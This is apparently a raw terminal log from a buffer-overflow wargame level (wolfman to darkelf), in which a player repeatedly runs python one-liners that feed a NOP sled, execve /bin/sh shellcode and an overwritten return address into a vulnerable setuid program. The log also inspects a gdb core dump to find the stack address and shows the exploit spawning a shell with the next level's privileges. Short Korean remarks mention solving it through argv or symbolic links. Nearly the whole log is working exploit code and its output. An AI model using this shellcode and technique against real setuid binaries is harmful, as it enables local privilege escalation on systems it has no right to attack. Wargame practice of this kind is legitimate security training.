[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x30\xfc\xff\xbf"'`
1￐h//shh/bin⏓ኂ°
               ̀0
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print"\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x30\xfc\xff\xbf"'`
1￐h//shh/bin⏓ኂ°
               ̀0
bash$ my-pass
euid = 506
kernel crashed
bash$ 
bash$ exit
exit
[wolfman@localhost wolfman]$ argv를 이용해서 풀어낸 것이다.
bash2: ⠲gv를: command not found
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print"\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x30\xfc\xff\xbf"+"\x0a"+"AAAA"'`
1￐h//shh/bin⏓ኂ°
               ̀0
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print"\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x30\xfc\xff\xbf"+"\x00"+"AAAA"'`
1￐h//shh/bin⏓ኂ°
               ̀0
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkelf A A                                                                                                                                                    
stack is still your friend.
[wolfman@localhost wolfman]$ 
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python "\x90"*128+"
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` 
darkelf
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
darkelf
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100x $es
0x2b:	Cannot access memory at address 0x2b
(gdb) x/100x $esp
0xbffffa30:	0x00000000	0xbffffa74	0xbffffa84	0x40013868
0xbffffa40:	0x00000003	0x08048450	0x00000000	0x08048471
0xbffffa50:	0x08048500	0x00000003	0xbffffa74	0x08048390
0xbffffa60:	0x0804864c	0x4000ae60	0xbffffa6c	0x40013e90
0xbffffa70:	0x00000003	0xbffffb82	0xbffffb8c	0xbffffbbd
0xbffffa80:	0x00000000	0xbffffc57	0xbffffc69	0xbffffc81
0xbffffa90:	0xbffffca0	0xbffffcc2	0xbffffccf	0xbffffe92
0xbffffaa0:	0xbffffeb1	0xbffffece	0xbffffee3	0xbfffff02
0xbffffab0:	0xbfffff0d	0xbfffff26	0xbfffff36	0xbfffff3e
0xbffffac0:	0xbfffff48	0xbfffff58	0xbfffff66	0xbfffff74
0xbffffad0:	0xbfffff85	0xbfffff90	0xbfffffa3	0xbfffffe6
0xbffffae0:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaf0:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffb00:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffb10:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffb20:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffb30:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffb40:	0x0fabfbff	0x0000000f	0xbffffb7d	0x00000000
0xbffffb50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb70:	0x00000000	0x00000000	0x00000000	0x38366900
0xbffffb80:	0x2f2e0036	0x6b726164	0x00666c61	0x41414141
0xbffffb90:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffba0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbb0:	0x41414141	0x41414141	0xbfbfbfbf	0x90909000
(gdb) 
0xbffffbc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbe0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x90909090	0x50c03190
0xbffffc40:	0x732f2f68	0x622f6868	0xe3896e69	0xe1895350
0xbffffc50:	0x0bb0c289	0x000080cd	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print "A"*44+"\x90\xfb\xff\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print "A"*44+"\xc0\xfb\xff\xbf"'` `python -c 'print"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{ÿ¿
bash$ id
uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print "A"*44+"\xc0\xfb\xff\xbf"+"\x20"+"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{ÿ¿
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print "A"*44+"\xc0\xfb\xff\xbf"+"\x0a"+"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{ÿ¿
bash$ exit
exit
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\xc0\xfb\xff\xbf"+"\x0a"+"\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{ÿ¿
bash$ my-pass
euid = 506


kernel crashed



bash$ exit
exit
[wolfman@localhost wolfman]$ ln -s ./dark
darkalf    darkelf    darkelf.c  
[wolfman@localhost wolfman]$ ln -s ./darkalf `python -c 'print "\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1￐h//shh/bin⏓ኂ°
                                                ̀' to `./darkalf': No such file or directory
[wolfman@localhost wolfman]$ ln -s `python -c 'print "\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` ./darkalf 
ln: ./darkalf: File exists
[wolfman@localhost wolfman]$ ls
core  darkalf  darkelf  darkelf.c
[wolfman@localhost wolfman]$ ln -s ./darkalf `python -c 'print "\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1￐h//shh/bin⏓ኂ°
                                                ̀' to `./darkalf': No such file or directory
[wolfman@localhost wolfman]$ ls
core  darkalf  darkelf  darkelf.c
[wolfman@localhost wolfman]$ ln -s ./darkalf `python -c 'print "\x90"*128+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1￐h//shh/bin⏓ኂ°
                                                ̀' to `./darkalf': No such file or directory
[wolfman@localhost wolfman]$ 
[wolfman@localhost wolfman]$ 심볼릭링크를 이용하여 풀수있다
bash2: 심볼릭링크를: command not found
[wolfman@localhost wolfman]$ 